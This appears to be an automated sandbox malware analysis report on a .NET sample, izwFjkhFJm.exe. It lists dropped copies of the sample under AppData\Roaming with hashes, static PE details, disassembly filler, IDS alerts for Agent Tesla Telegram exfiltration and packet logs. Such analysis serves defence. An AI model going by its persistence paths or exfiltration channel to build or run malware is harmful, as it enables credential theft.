                                        SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                        MD5:FB4B7720101F874710FF986326F7980F
                                        SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                        SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                        SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5829
                                        Entropy (8bit):4.8968676994158
                                        Encrypted:false
                                        SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                        MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                        SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                        SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                        SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                        Malicious:false
                                        Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15672
                                        Entropy (8bit):5.542414046296337
                                        Encrypted:false
                                        SSDEEP:384:nte/AM1oA1uPqtIosSjn+ilr3bsFvMs48LP:OrAqtyo+ilrIRpP
                                        MD5:8AEBA6925AFDFB54DA529AC11C28736E
                                        SHA1:05C4C8EE5B22C660A33DCFFC4F0E35900AF7BC90
                                        SHA-256:14595BFD9842BA212582C416C1B2F4128E1AC203DB766B0F5359EB46BF1F6265
                                        SHA-512:3C1A1D0E2273E4E9DA27384EEE2CED1B22EEC63B102D4602903705C8D9EDA6BCF07053A2FCFE0007629EE641F4B93F2D9D06F276E06995C96529DECD51E02E5F
                                        Malicious:false
                                        Preview:@...e...........7.......$.....s.s...............................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23uza2uz.txl.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ch2n5eak.wf2.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5xdroaz.3qx.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsdp1x51.web.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4snmec2.2zw.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rydz4q53.akc.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txscot0j.aim.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xu1bhbsk.zgm.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1863168
                                        Entropy (8bit):5.309741607982687
                                        Encrypted:false
                                        SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                        MD5:AE2A3B41292C66A9DD6F10C874C05293
                                        SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                        SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                        SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 53%, Browse
                                        • Antivirus: ReversingLabs, Detection: 33%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..

                                        C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1863168
                                        Entropy (8bit):5.309741607982687
                                        Encrypted:false
                                        SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                        MD5:AE2A3B41292C66A9DD6F10C874C05293
                                        SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                        SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                        SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 33%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..

                                        C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.309741607982687
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:izwFjkhFJm.exe
                                        File size:1863168
                                        MD5:ae2a3b41292c66a9dd6f10c874c05293
                                        SHA1:caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
                                        SHA256:65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
                                        SHA512:54606fce1ce37ca0b4a25dd94abc5cd47be86a498204a0581def8a62f714ea101b817570a456ff7e054a4c8d3de8f3d69a8cd823dfa87515c4690ae229bb6315
                                        SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                        TLSH:0D854CF24193FEC4976F2D4481143A40DC101C6797BC9698FDC92AA793E9978EF9CAB0
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`................................

                                        File Icon

                                        Icon Hash:78b87c6c6c606880

                                        Static PE Info

                                        General

                                        Entrypoint:0x5c66f2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6417E07C [Mon Mar 20 04:26:36 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1c66980x57.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c80000x21e8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cc0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x1c46f80x1c4800False0.4735319190262431data5.272126053067271IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x1c80000x21e80x2200False0.8832720588235294data7.595705097596992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1cc0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x1c81300x1c12PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_GROUP_ICON0x1c9d440x14data
                                        RT_VERSION0x1c9d580x2dcdata
                                        RT_MANIFEST0x1ca0340x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.3149.154.167.220497154432851779 03/20/23-18:33:24.869717TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49715443192.168.2.3149.154.167.220
                                        192.168.2.3149.154.167.220497014432851779 03/20/23-18:31:36.462231TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49701443192.168.2.3149.154.167.220

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 20, 2023 18:31:27.699748039 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:27.699857950 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:27.699994087 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:27.733558893 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:27.733618975 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.379163980 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.379291058 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:28.382338047 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:28.382364035 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.382752895 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.586198092 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:28.648602009 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:28.648667097 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.803409100 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.803500891 CET44349699173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:31:28.803656101 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:28.804965973 CET49699443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:31:36.293730974 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.293807983 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.293895960 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.294677019 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.294722080 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.361607075 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.361701012 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.367089987 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.367127895 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.367513895 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.428234100 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.428277969 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.455465078 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.462035894 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.462074995 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.567434072 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.567543983 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.568159103 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.568188906 CET44349701149.154.167.220192.168.2.3
                                        Mar 20, 2023 18:31:36.568207979 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:31:36.568258047 CET49701443192.168.2.3149.154.167.220
                                        Mar 20, 2023 18:32:35.641273975 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:35.641380072 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:35.641500950 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:35.658441067 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:35.658540964 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:36.303930998 CET44349702173.231.16.76192.168.2.3
                                        Mar 20, 2023 18:32:36.304028988 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:36.306864977 CET49702443192.168.2.3173.231.16.76
                                        Mar 20, 2023 18:32:36.306899071 CET44349702173.231.16.76192.168.2.3
